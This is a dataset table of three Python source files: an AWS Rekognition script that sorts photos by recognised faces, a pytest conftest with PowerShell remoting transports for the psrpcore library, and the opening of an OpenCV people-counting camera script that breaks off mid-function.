source (stringlengths 3–86) | python (stringlengths 75–1.04M)
|---|---|
facelook_photo_management.py
|
##Main program
##Before running this program, you need a functional AWS CLI and boto3 installed.
##Author: AI_Papa (matthew.tsoi@gmail.com)
##Import AWS client modules
import boto3
from botocore.exceptions import ClientError
##Import modules for multi-thread and general OS utilities
import logging,time, io, os, shutil
from threading import Thread
from argparse import ArgumentParser
##Import module for image processing. **Needs an additional pip install (Pillow)
from PIL import Image#, ImageDraw, ExifTags, ImageColor
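##Optional sanity check (an illustrative sketch, not part of the original script):
##the header comment above says a working AWS CLI/boto3 setup is required, so this
##helper just verifies that credentials resolve before any Rekognition call is made.
##sts.get_caller_identity() is a standard boto3 call; whether and where to invoke
##this helper is an assumption left to the reader.
def check_aws_credentials():
    try:
        identity = boto3.client('sts').get_caller_identity()
        logging.info('AWS credentials OK for account ' + identity['Account'])
        return True
    except Exception as err:
        logging.error('AWS credentials check failed: ' + str(err))
        return False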
def init_logger():
# set up logging to file
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='facelook_photo_management.log',
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.info('Logger started!')
def createCollection(collectionId=''):
logging.info('Creating face index collection ['+collectionId+']')
# Replace collectionID with the name of the collection that you want to create.
#maxResults = 2
client=boto3.client('rekognition')
response = client.create_collection(CollectionId=collectionId)
logging.info('Collection ARN: ' + response['CollectionArn'])
logging.info('Status code: ' + str(response['StatusCode']))
if response['StatusCode']==200:
logging.info('Collection created successfully!')
return response['CollectionArn']
else:
return 0
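##Illustrative companion helper (a sketch, not called by the main routine below):
##lists the face collections that already exist in the account/region, which is
##handy when a previous run left a 'faceCollection' behind. list_collections is a
##standard Rekognition API; pagination (NextToken) is ignored in this sketch.
def listCollections():
    client = boto3.client('rekognition')
    response = client.list_collections()
    for existing_id in response.get('CollectionIds', []):
        logging.info('Existing collection: ' + existing_id)
    return response.get('CollectionIds', [])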
def removeCollection(collectionId=''):
logging.info('Attempting to delete collection ' + collectionId)
client=boto3.client('rekognition')
statusCode=''
try:
response=client.delete_collection(CollectionId=collectionId)
statusCode=response['StatusCode']
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
logging.info ('The collection ' + collectionId + ' was not found ')
else:
logging.error ('Error other than Not Found occurred: ' + e.response['Error']['Message'])
statusCode=e.response['ResponseMetadata']['HTTPStatusCode']
logging.info('Operation returned Status Code: ' + str(statusCode))
def addFaces(filename='',collectionId=''):
faceIds = []
tic=time.time()
logging.info('['+filename+'] Reading image file: '+filename)
image = Image.open(open(filename,'rb'))
stream = io.BytesIO()
image.save(stream, format=image.format)
image_binary = stream.getvalue()
client=boto3.client('rekognition')
response=client.index_faces(CollectionId=collectionId,
#Image={'S3Object':{'Bucket':bucket,'Name':photo}},
Image={'Bytes': image_binary},
ExternalImageId=os.path.splitext(os.path.basename(filename))[0],
MaxFaces=1,
QualityFilter="AUTO",
DetectionAttributes=['ALL'])
toc = time.time()
logging.info ('['+filename+'] Add face completed. Processing time: '+str(round((toc-tic),2))+' sec.')
logging.debug ('['+filename+'] Faces indexed:')
for faceRecord in response['FaceRecords']:
logging.info('['+filename+'] Face signature: ' + faceRecord['Face']['FaceId'])
logging.info('['+filename+'] Face ID: ' + faceRecord['Face']['ExternalImageId'])
logging.info('['+filename+'] Confidence: {}'.format(faceRecord['Face']['Confidence']))
logging.debug('['+filename+'] Location: {}'.format(faceRecord['Face']['BoundingBox']))
faceIds.append([faceRecord['Face']['ExternalImageId'],faceRecord['Face']['FaceId']])
return faceIds
#print('Faces not indexed:')
#for unindexedFace in response['UnindexedFaces']:
# print(' Location: {}'.format(unindexedFace['FaceDetail']['BoundingBox']))
# print(' Reasons:')
# for reason in unindexedFace['Reasons']:
# print(' ' + reason)
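##Note on index_faces above: MaxFaces=1 tells Rekognition to index only the largest
##face found in each reference image, so every file in the face-index folder should
##contain a single person; the filename without its extension becomes the
##ExternalImageId that later matches report back.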
def detectFaces(img='',debug=False):
#Get a list of face IDs from an image
faces=[]
photo= img
# Open image and get image data from stream.
image = Image.open(open(photo,'rb'))
stream = io.BytesIO()
image.save(stream, format=image.format)
image_binary = stream.getvalue()
client = boto3.client('rekognition')
tic = time.time()
response = client.detect_faces(Image={'Bytes': image_binary},Attributes=['ALL'])
toc = time.time()
logging.info('['+img+'] Face detection completed. '+str(len(response['FaceDetails']))+' faces detected in '+str(round(toc-tic,4))+'sec.')
for faceDetail in response['FaceDetails']:
#print('The detected face is between ' +
# str(faceDetail['AgeRange']['Low']) +
# ' and ' + str(faceDetail['AgeRange']['High']) +
# ' years old')
#print('The gender of detected face is'+str(faceDetail['Gender']))
box = faceDetail['BoundingBox']
#print(box)
imgWidth, imgHeight = image.size
left = imgWidth * box['Left']
top = imgHeight * box['Top']
width = imgWidth * box['Width']
height = imgHeight * box['Height']
face=image.crop((left,top,left+width,top+height))
faces.append(face)
#ImageDraw.Draw(face)
if debug:
face.show()
if debug:
image.show()
return faces
def matchFace(collectionId='',face='',input_folder='',path_sep='',img_file='',output_folder='',threshold=70,debug=False):
stream = io.BytesIO()
face.save(stream, format='PNG')
image_binary = stream.getvalue()
client = boto3.client('rekognition')
try:
response = client.search_faces_by_image(CollectionId=collectionId,FaceMatchThreshold=threshold,Image={'Bytes': image_binary},MaxFaces=123)
except:
if debug:
face.show()
return
if debug:
print (response['FaceMatches'])
face.show()
if response['FaceMatches']:
#face.show()
logging.info('['+img_file+'] Matched person ['+response['FaceMatches'][0]['Face']['ExternalImageId']+'] with similarity '+str(round(response['FaceMatches'][0]['Similarity'],2))+'%')
matched_person = response['FaceMatches'][0]['Face']['ExternalImageId']
##create the person folder if it does not exist yet
if os.path.exists(output_folder+path_sep+matched_person):
pass
else:
os.mkdir(output_folder+path_sep+matched_person)
shutil.copyfile(input_folder+path_sep+img_file,output_folder+path_sep+matched_person+path_sep+img_file)
def matchFaces(collectionId='',input_folder='',path_sep="\\",img_file='',output_folder='',threshold=70,debug=False):
##Match detected faces with existing collection
tic = time.time()
##Get a list of faces from photo
faces=detectFaces(input_folder+path_sep+img_file,debug=debug)
threads=[]
#client = boto3.client('rekognition')
for face in faces:
t=Thread(target=matchFace,args=(collectionId,face,input_folder,path_sep,img_file,output_folder,threshold,debug))
t.start()
threads.append(t)
for t in threads:
t.join(180)
toc = time.time()
#logging.info('['+img_file+'] Face matched completed and found ['+str(len(matched_faces))+'] faces in '+str(round(toc-tic,4))+'sec.')
logging.info('['+img_file+'] Face match completed in '+str(round(toc-tic,4))+' sec.')
# return matched_faces
def isWindows():
if os.name=='nt':
return True
else:
return False
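##Portability note (added): the manual path_sep handling below could normally be
##replaced by os.path.join, which picks the right separator on both Windows and
##POSIX, e.g. os.path.join(input_folder, filename).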
##Main routine
if __name__ == "__main__":
overall_tic=time.time()
##input argument defaults
#input_folder='./in_photo/'
#input_face_folder = './in_face/'
#output_folder='./out_photo'
#threshold=70
#Parse input arguments
parser = ArgumentParser(prog="facelook",description="Use the AWS Rekognition service to sort photos by individual matched face (person)",usage="Use face recognition to manage photos")
##Configure input arguments
parser.add_argument("--input_folder", default='./in_photo/', type=str, help="Folder path for photos to be processed.")
parser.add_argument("--input_face_folder", default='./in_face/', type=str, help="Folder path for face photos. The filename is used as the face reference ID.")
parser.add_argument("--output_folder", default='./out_photo/', type=str, help="Output folder")
parser.add_argument("--threshold", default=85, type=int, help="Face similarity match threshold")
args = parser.parse_args()
if args.input_folder is not None:
input_folder=args.input_folder
if args.input_face_folder is not None:
input_face_folder=args.input_face_folder
if args.output_folder is not None:
output_folder=args.output_folder
if args.threshold is not None:
threshold=args.threshold
##determine OS platform to define path separator
if isWindows():
path_sep='\\'
else:
path_sep='/'
##init logger
init_logger()
try:
removeCollection('faceCollection')
except:
logging.warning('Collection does not exist!')
##Create a face index collection
createCollection('faceCollection')
##Add face index into collection from face index folder
#logging.info(addFaces('./in_face/donald.jpg','faceCollection'))
directory = os.fsencode(input_face_folder)
threads=[]
tic=time.time()
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpeg") or filename.endswith(".jpg"):
#addFaces(input_face_folder+path_sep+filename,'faceCollection')
t=Thread(target=addFaces,args=(input_face_folder+path_sep+filename,'faceCollection'))
t.start()
threads.append(t)
logging.info(str(len(threads))+' threads started for face index processing.')
##Wait for all face index threads completed
for t in threads:
t.join(180)
toc=time.time()
logging.info('All faces added to collection in '+str(round(toc-tic,4))+' sec.')
#time.sleep(3)
##Now detect faces from photo collection and put them into identified person folder(s)
directory = os.fsencode(input_folder)
threads=[]
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpeg") or filename.endswith(".jpg"):
#matchFaces('faceCollection',input_folder,path_sep,filename,output_folder)
t=Thread(target=matchFaces,args=('faceCollection',input_folder,path_sep,filename,output_folder,threshold))
t.start()
threads.append(t)
for t in threads:
t.join(60)
overall_toc=time.time()
logging.info('Process completed in '+str(round(overall_toc-overall_tic,2))+' sec.')
##Remove the face collection
#removeCollection('faceCollection')
|
conftest.py
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2021, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
import base64
import collections
import contextlib
import os
import queue
import socket
import subprocess
import threading
import typing
import uuid
from xml.etree import ElementTree
import pytest
from xmldiff import main as _xmldiff
if os.name == "nt":
import win32api
import win32event
import win32file
import win32pipe
import winerror
import psrpcore
BUFFER_SIZE = 327681
# Contains control characters, non-ascii chars, and chars that are surrogate pairs in UTF-16
COMPLEX_STRING = "treble clef\n _x0000_ _X0000_ %s café" % b"\xF0\x9D\x84\x9E".decode("utf-8")
COMPLEX_ENCODED_STRING = "treble clef_x000A_ _x005F_x0000_ _x005F_X0000_ _xD834__xDD1E_ café"
T = typing.TypeVar("T", psrpcore.ClientRunspacePool, psrpcore.ServerRunspacePool)
OutOfProcPacket = collections.namedtuple("OutOfProcPacket", ["action", "ps_guid", "data"])
def which(program: str) -> typing.Optional[str]:
for path in os.environ.get("PATH", "").split(os.pathsep):
exe = os.path.join(path, program)
if os.path.isfile(exe) and os.access(exe, os.X_OK):
return exe
return
PWSH_PATH = which("pwsh.exe" if os.name == "nt" else "pwsh")
class FakeCryptoProvider(psrpcore.types.PSCryptoProvider):
def decrypt(self, value: bytes) -> bytes:
return value
def encrypt(self, value: bytes) -> bytes:
return value
def register_key(self, key: bytes) -> None:
pass
class OutOfProcTransport(typing.Generic[T]):
def __init__(self, runspace: T) -> None:
self.runspace = runspace
self._incoming: queue.Queue[typing.Union[Exception, OutOfProcPacket]] = queue.Queue()
self._listen_task = threading.Thread(target=self._read_task)
self._wait = threading.Condition()
self._wait_set = set()
def __enter__(self) -> "OutOfProcTransport":
self._open()
self._listen_task.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self._close()
self._listen_task.join()
def next_payload(self) -> OutOfProcPacket:
# No long running tests, anything taking more than 60 seconds is a failure
payload = self._incoming.get(timeout=60)
if isinstance(payload, Exception):
raise payload
return payload
def next_event(self) -> psrpcore.PSRPEvent:
while True:
event = self.runspace.next_event()
if event:
return event
payload = self.next_payload()
if payload.action != "Data":
continue
self.runspace.receive_data(payload.data)
def close(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
with self._wait_ack("Close", pipeline_id):
self._send(ps_guid_packet("Close", pipeline_id))
def close_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("CloseAck", pipeline_id))
def command(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
with self._wait_ack("Command", pipeline_id):
self._send(ps_guid_packet("Command", pipeline_id))
def command_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("CommandAck", pipeline_id))
def data(
self,
wait_ack: bool = True,
) -> bool:
data = self.runspace.data_to_send()
if not data:
return False
with self._wait_ack("Data" if wait_ack else None, data.pipeline_id):
self._send(ps_data_packet(*data))
return True
def data_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("DataAck", pipeline_id))
def signal(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
with self._wait_ack("Signal", pipeline_id):
self._send(ps_guid_packet("Signal", pipeline_id))
def signal_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("SignalAck", pipeline_id))
def _read_task(self):
try:
self._read()
except Exception as e:
self._incoming.put(e)
finally:
with self._wait:
for key in list(self._wait_set):
self._wait_set.remove(key)
self._wait.notify_all()
def _read(self) -> None:
buffer = bytearray()
while True:
try:
end_idx = buffer.index(b"\n")
except ValueError:
# Don't have enough data - wait for more to arrive.
read_data = self._recv()
if not read_data:
break
buffer += read_data
continue
raw_element = bytes(buffer[:end_idx])
buffer = buffer[end_idx + 1 :]
element = ElementTree.fromstring(raw_element)
ps_guid = uuid.UUID(element.attrib["PSGuid"].upper())
if ps_guid == uuid.UUID(int=0):
ps_guid = None
if element.tag == "Data":
psrp_data = base64.b64decode(element.text) if element.text else b""
stream_type = (
psrpcore.StreamType.prompt_response
if element.attrib.get("Stream", "") == "PromptResponse"
else psrpcore.StreamType.default
)
payload = psrpcore.PSRPPayload(psrp_data, stream_type, ps_guid)
self._incoming.put(OutOfProcPacket("Data", ps_guid, payload))
elif element.tag.endswith("Ack"):
pipeline = str(ps_guid) if ps_guid else ""
with self._wait:
self._wait_set.remove(f"{element.tag}:{pipeline.upper()}")
self._wait.notify_all()
else:
self._incoming.put(OutOfProcPacket(element.tag, ps_guid, None))
def _open(self) -> None:
raise NotImplementedError()
def _close(self) -> None:
raise NotImplementedError()
def _recv(self) -> typing.Optional[bytes]:
raise NotImplementedError()
def _send(self, data: bytes) -> None:
raise NotImplementedError()
@contextlib.contextmanager
def _wait_ack(
self,
action: typing.Optional[str],
pipeline_id: typing.Optional[uuid.UUID] = None,
):
if not action:
yield
return
pipeline = str(pipeline_id) if pipeline_id else ""
key = f"{action}Ack:{pipeline.upper()}"
with self._wait:
self._wait_set.add(key)
yield
self._wait.wait_for(lambda: key not in self._wait_set)
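# How the ack handshake above works: _wait_ack registers "<Action>Ack:<PIPELINE>"
# in _wait_set before the packet is sent, and _read() removes that key (and
# notifies the condition) when the matching *Ack element arrives, releasing the
# wait_for() call.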
class ClientTransport(OutOfProcTransport[psrpcore.ClientRunspacePool]):
def __init__(self, runspace: psrpcore.ClientRunspacePool, executable: str) -> None:
super().__init__(runspace)
self._executable = executable
self._process = None
def _open(self) -> None:
pipe = subprocess.PIPE
self._process = subprocess.Popen([self._executable, "-NoLogo", "-s"], stdin=pipe, stdout=pipe, stderr=pipe)
def _close(self) -> None:
if self._process.poll() is None:
self._process.kill()
self._process.wait()
def _recv(self) -> typing.Optional[bytes]:
stdout = self._process.stdout.readline()
if not stdout:
stdout, stderr = self._process.communicate()
if stderr:
raise Exception(stderr.decode())
return stdout
def _send(self, data: bytes) -> None:
self._process.stdin.write(data)
self._process.stdin.flush()
class ServerTransport(OutOfProcTransport[psrpcore.ServerRunspacePool]):
def __init__(self, runspace: psrpcore.ServerRunspacePool, pipe_name: str) -> None:
super().__init__(runspace)
self.pipe_name = pipe_name
def data(
self,
wait_ack: bool = False,
) -> bool:
return super().data(wait_ack=wait_ack)
class UnixDomainSocket(ServerTransport):
def __init__(self, runspace: psrpcore.ServerRunspacePool, pipe_name: str) -> None:
super().__init__(runspace, pipe_name)
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._conn: typing.Optional[socket.socket] = None
self._sock_lock = threading.Lock()
def _open(self) -> None:
self._sock.bind(self.pipe_name)
self._sock.listen(1)
def _close(self) -> None:
if self._conn:
self._conn.shutdown(socket.SHUT_RDWR)
self._conn.close()
self._conn = None
self._sock.shutdown(socket.SHUT_RDWR)
self._sock.close()
def _recv(self) -> typing.Optional[bytes]:
return self._get_sock().recv(BUFFER_SIZE)
def _send(self, data: bytes) -> None:
self._get_sock().sendall(data)
def _get_sock(self) -> socket.socket:
with self._sock_lock:
if not self._conn:
self._conn = self._sock.accept()[0]
return self._conn
class NamedPipe(ServerTransport):
def __init__(self, runspace: psrpcore.ServerRunspacePool, pipe_name: str) -> None:
super().__init__(runspace, pipe_name)
self._pipe = win32pipe.CreateNamedPipe(
"\\\\.\\pipe\\" + pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX | win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.PIPE_WAIT,
1,
BUFFER_SIZE,
BUFFER_SIZE,
0,
None,
)
self._connected = False
self._end_event = win32event.CreateEvent(None, True, 0, None)
self._write_requested = win32event.CreateEvent(None, True, 0, None)
self._pipe_lock = threading.Lock()
self._write_lock = threading.Lock()
def _open(self) -> None:
pass
def _close(self) -> None:
win32event.SetEvent(self._end_event)
with self._pipe_lock:
if self._connected:
win32pipe.DisconnectNamedPipe(self._pipe)
self._connected = False
if self._pipe:
win32file.CloseHandle(self._pipe)
self._pipe = None
def _recv(self) -> typing.Optional[bytes]:
buffer = win32file.AllocateReadBuffer(BUFFER_SIZE)
overlapped = win32file.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, True, 0, None)
while True:
with self._write_lock:
pass
with self._pipe_lock:
self._connect()
res = win32file.ReadFile(self._pipe, buffer, overlapped)[0]
if res == winerror.ERROR_SUCCESS:
bytes_read = win32file.GetOverlappedResult(self._pipe, overlapped, True)
return bytes(buffer[:bytes_read])
elif res != winerror.ERROR_IO_PENDING:
msg = win32api.FormatMessage(res)
raise Exception(f"Named pipe read failed 0x{res:08X} - {msg}")
wait_idx = win32event.WaitForMultipleObjects(
(overlapped.hEvent, self._end_event, self._write_requested),
False,
win32event.INFINITE,
)
if wait_idx != win32event.WAIT_OBJECT_0:
win32file.CancelIo(self._pipe)
try:
bytes_read = win32file.GetOverlappedResult(self._pipe, overlapped, True)
except win32file.error as err:
if err.winerror != winerror.ERROR_OPERATION_ABORTED:
raise
bytes_read = 0
if bytes_read:
data = bytes(buffer[:bytes_read])
return data
elif wait_idx == win32event.WAIT_OBJECT_0 + 1:
return
def _send(self, data: bytes) -> None:
with self._write_lock:
win32event.SetEvent(self._write_requested)
with self._pipe_lock:
buffer = bytearray(data)
offset = 0
self._connect()
while offset < len(data):
res, bytes_written = win32file.WriteFile(self._pipe, buffer[offset:])
if res != winerror.ERROR_SUCCESS:
msg = win32api.FormatMessage(res)
raise Exception(f"Named pipe write failed 0x{res:08X} - {msg}")
offset += bytes_written
win32file.FlushFileBuffers(self._pipe)
win32event.ResetEvent(self._write_requested)
def _connect(self):
if not self._connected:
overlapped = win32file.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, True, 0, None)
res = win32pipe.ConnectNamedPipe(self._pipe, overlapped)
if res == winerror.ERROR_IO_PENDING:
wait_idx = win32event.WaitForMultipleObjects(
(overlapped.hEvent, self._end_event),
False,
win32event.INFINITE,
)
if wait_idx != win32event.WAIT_OBJECT_0:
raise Exception("Failed while waiting for client connection")
elif res != winerror.ERROR_SUCCESS:
msg = win32api.FormatMessage(res)
raise Exception(f"Named pipe connect failed 0x{res:08X} - {msg}")
self._connected = True
def get_runspace_pair(
min_runspaces: int = 1, max_runspaces: int = 1
) -> typing.Tuple[psrpcore.ClientRunspacePool, psrpcore.ServerRunspacePool]:
client = psrpcore.ClientRunspacePool(min_runspaces=min_runspaces, max_runspaces=max_runspaces)
server = psrpcore.ServerRunspacePool()
client.open()
server.receive_data(client.data_to_send())
server.next_event()
server.next_event()
client.receive_data(server.data_to_send())
client.next_event()
client.next_event()
client.next_event()
return client, server
def assert_xml_diff(actual: str, expected: str):
# We don't care that the XML text is the exact same but rather if they represent the same object. Python versions
# vary on how they order attributes of an element whereas xmldiff doesn't care.
diff = _xmldiff.diff_texts(actual, expected)
if len(diff) != 0:
# The assertion for diff_texts isn't pretty and it's easier to see what the diff is by comparing the text.
assert actual == expected
def serialize(value: typing.Any, **kwargs: typing.Any) -> ElementTree.Element:
return psrpcore.types.serialize(value, FakeCryptoProvider(), **kwargs)
def deserialize(value: ElementTree.Element, **kwargs: typing.Any):
return psrpcore.types.deserialize(value, FakeCryptoProvider(), **kwargs)
def ps_data_packet(
data: bytes,
stream_type: psrpcore.StreamType = psrpcore.StreamType.default,
ps_guid: typing.Optional[uuid.UUID] = None,
) -> bytes:
"""Data packet for PSRP fragments.
This creates a data packet that is used to encode PSRP fragments when
sending to the server.
Args:
data: The PSRP fragments to encode.
stream_type: The stream type to target, Default or PromptResponse.
ps_guid: Set to `None` or a 0'd UUID to target the RunspacePool,
otherwise this should be the pipeline UUID.
Returns:
bytes: The encoded data XML packet.
"""
ps_guid = ps_guid or uuid.UUID(int=0)
stream_name = b"Default" if stream_type == psrpcore.StreamType.default else b"PromptResponse"
return b"<Data Stream='%s' PSGuid='%s'>%s</Data>\n" % (
stream_name,
str(ps_guid).lower().encode(),
base64.b64encode(data),
)
def ps_guid_packet(
element: str,
ps_guid: typing.Optional[uuid.UUID] = None,
) -> bytes:
"""Common PSGuid packet for PSRP message.
This creates a PSGuid packet that is used to signal events and stages in
the PSRP exchange. Unlike the data packet this does not contain any PSRP
fragments.
Args:
element: The element type, can be DataAck, Command, CommandAck, Close,
CloseAck, Signal, and SignalAck.
ps_guid: Set to `None` or a 0'd UUID to target the RunspacePool,
otherwise this should be the pipeline UUID.
Returns:
bytes: The encoded PSGuid packet.
"""
ps_guid = ps_guid or uuid.UUID(int=0)
return b"<%s PSGuid='%s' />\n" % (element.encode(), str(ps_guid).lower().encode())
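# Example of the wire format produced by the two helpers above (derived from the
# code, using the default zeroed PSGuid):
#   ps_data_packet(b"\x01\x02")
#     -> b"<Data Stream='Default' PSGuid='00000000-0000-0000-0000-000000000000'>AQI=</Data>\n"
#   ps_guid_packet("Close")
#     -> b"<Close PSGuid='00000000-0000-0000-0000-000000000000' />\n"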
def run_pipeline(
client_pwsh: ClientTransport,
script: str,
host: typing.Optional[psrpcore.types.HostInfo] = None,
) -> typing.List[psrpcore.PSRPEvent]:
ps = psrpcore.ClientPowerShell(client_pwsh.runspace, host=host)
ps.add_script(script)
ps.start()
client_pwsh.command(ps.pipeline_id)
client_pwsh.data()
events = []
while ps.state == psrpcore.types.PSInvocationState.Running:
events.append(client_pwsh.next_event())
ps.close()
client_pwsh.close(ps.pipeline_id)
return events
@pytest.fixture(scope="function")
def client_pwsh():
"""Creates an unopened Runspace Pool against a pwsh process."""
if not PWSH_PATH:
pytest.skip("Integration test requires pwsh")
runspace = psrpcore.ClientRunspacePool()
with ClientTransport(runspace, PWSH_PATH) as conn:
yield conn
@pytest.fixture(scope="function")
def client_opened_pwsh():
"""Creates an Opened Runspace Pool against a pwsh process."""
if not PWSH_PATH:
pytest.skip("Integration test requires pwsh")
host = psrpcore.types.HostInfo(
IsHostNull=False,
IsHostUINull=False,
IsHostRawUINull=False,
UseRunspaceHost=False,
HostDefaultData=psrpcore.types.HostDefaultData(
ForegroundColor=psrpcore.types.ConsoleColor.Blue,
BackgroundColor=psrpcore.types.ConsoleColor.Red,
CursorPosition=psrpcore.types.Coordinates(X=10, Y=20),
WindowPosition=psrpcore.types.Coordinates(X=30, Y=40),
CursorSize=5,
BufferSize=psrpcore.types.Size(Width=60, Height=120),
WindowSize=psrpcore.types.Size(Width=60, Height=120),
MaxWindowSize=psrpcore.types.Size(Width=60, Height=120),
MaxPhysicalWindowSize=psrpcore.types.Size(Width=60, Height=120),
WindowTitle="My Window",
),
)
runspace = psrpcore.ClientRunspacePool(host=host)
with ClientTransport(runspace, PWSH_PATH) as pwsh:
pwsh.runspace.open()
pwsh.data()
while pwsh.runspace.state == psrpcore.types.RunspacePoolState.Opening:
pwsh.next_event()
yield pwsh
@pytest.fixture(scope="function")
def server_pwsh(tmp_path):
"""Creates a pipe PSRP server that can be called in pwsh."""
if not PWSH_PATH:
pytest.skip("Integration test requires pwsh")
pipe_name = f"psrpcore-{str(uuid.uuid4()).upper()}"
runspace = psrpcore.ServerRunspacePool()
try:
if os.name == "nt":
transport = NamedPipe(runspace, pipe_name)
else:
pipe_name = str(tmp_path / pipe_name)
transport = UnixDomainSocket(runspace, pipe_name)
with transport:
yield transport
finally:
if os.name != "nt":
try:
os.unlink(pipe_name)
except FileNotFoundError:
pass
|
run_thread.py
|
from mylib.centroidtracker import CentroidTracker
from mylib.trackableobject import TrackableObject
from imutils.video import VideoStream
from imutils.video import FPS
#from imutils import resize
from mylib.mailer import Mailer
from mylib import config
from mylib.config import x1,y1,x2,y2,vertical_direction,enter_direction,cam_place
import time, schedule
import numpy as np
import argparse, imutils
import time, dlib, cv2, datetime
#from itertools import zip_longest
from Lineiterator import createLineIterator
from limitexceed import check_exceed
from get_requests import send_req
from os.path import exists
from excel_data_converter import create_summary, data_converter
import queue
import os,sys
from multiprocessing import Queue, Process
t0 = time.time()
class variable:
def __init__(self):
self.ct = CentroidTracker(maxDisappeared=40, maxDistance=50)
self.trackers=[]
self.trackableObjects={}
self.totalFrames=0
self.x=[]
self.totalDown=0
self.totalUp=0
self.empty=[]
self.empty1=[]
self.cap=cv2.VideoCapture(config.url)
self.H = None
self.W= None
self.fivemin= datetime.datetime.now()+datetime.timedelta(0,300)
self.writer = None
self.do_malier = 1
tmr=datetime.datetime.now()
try:
#tmr=tmr.replace(day=tmr.day + 1, hour=21, minute=12, second=0, microsecond=0)
tmr=tmr.replace(day=tmr.day + 1, hour=0, minute=0, second=0, microsecond=0)
except ValueError:
try:
tmr=tmr.replace(month=tmr.month + 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
except ValueError:
tmr=tmr.replace(year= tmr.year + 1 ,month= 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
self.tmr =tmr
var=variable()
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", required=False, default = 'mobilenet_ssd/MobileNetSSD_deploy.prototxt',
help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=False,default = 'mobilenet_ssd/MobileNetSSD_deploy.caffemodel',
help="path to Caffe pre-trained model")
ap.add_argument("-i", "--input", type=str,
help="path to optional input video file")
ap.add_argument("-cam", "--camera", required=True,type=str,
help="summary camera name")
ap.add_argument("-o", "--output", type=str,
help="path to optional output video file")
# confidence default 0.4
ap.add_argument("-c", "--confidence", type=float, default=0.4,
help="minimum probability to filter weak detections")
ap.add_argument("-s", "--skip-frames", type=int, default=30,
help="# of skip frames between detections")
args = vars(ap.parse_args())
# initialize the list of class labels MobileNet SSD was trained to
# detect
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
# load our serialized model from disk
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])
# if a video path was not supplied, grab a reference to the ip camera
if not args.get("input", False):
print("[INFO] Starting the live stream..")
vs = VideoStream(src=config.url).start()
#time.sleep(2.0)
# otherwise, grab a reference to the video file
else:
print("[INFO] Starting the video..")
vs = cv2.VideoCapture(args["input"])
# initialize the video writer (we'll instantiate later if need be)
writer = None
# initialize the frame dimensions (we'll set them as soon as we read
# the first frame from the video)
W = None
H = None
if config.five_mins == True:
now=datetime.datetime.now()
fivemin= now+datetime.timedelta(0,300)
if config.people_change == True:
peoplechangelist= []
###################################
try:
m = ((-1*y2)-y1)/((x2)-x1)
except ZeroDivisionError:
m = 1000000001
print(m)
# m = (y2-y1)/(x2-x1)
# 0,0 -w // 2, -hi
#print(m)
iterlist=createLineIterator(np.array([int(round(x1)), int(round(y1))]),np.array([int(round(x2)), int(round(y2))]))
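# Added note: m characterizes the orientation of the configured counting line; the
# try/except above falls back to the sentinel 1000000001 when x2 == x1 (where the
# slope formula would divide by zero), and the branches further down treat
# m >= 1000000000 as that vertical case. iterlist holds the pixel points along the
# line that the crossing tests compare centroids against.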
# instantiate our centroid tracker, then initialize a list to store
# each of our dlib correlation trackers, followed by a dictionary to
# map each unique object ID to a TrackableObject
################
#q = queue.Queue()
# start the frames per second throughput estimator
fps = FPS().start()
#if config.Thread:
# vs = thread.ThreadingClass(config.url)
def capture(q):
while True:
ret, frame = var.cap.read() # read the next frame from the camera capture
if not ret:
break
if not q.empty():
try:
q.get_nowait()
except queue.Empty:
pass
q.put(frame)
#frame = vs.read()
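# Added note: capture() above keeps only the freshest frame in the queue by
# draining any stale frame with get_nowait() before putting the new one, so
# tracker_peo() below always works on near-live video instead of falling behind.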
def tracker_peo(q):
while True:
frame = q.get()
frame = frame[1] if args.get("input", False) else frame
# if we are viewing a video and we did not grab a frame then we
# have reached the end of the video
if args["input"] is not None and frame is None:
break
# resize the frame to have a maximum width of 500 pixels (the
# less data we have, the faster we can process it), then convert
# the frame from BGR to RGB for dlib
try:
frame = imutils.resize(frame, width = 500)
except AttributeError:
print(frame)
raise AttributeError
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# if the frame dimensions are empty, set them
try:
if var.W is None or var.H is None:
(var.H, var.W) = frame.shape[:2]
print(f"Frame height is : {var.H}, frame width is : {var.W}")
except AttributeError:
print('(H, W) = frame.shape[:2] error')
raise AttributeError
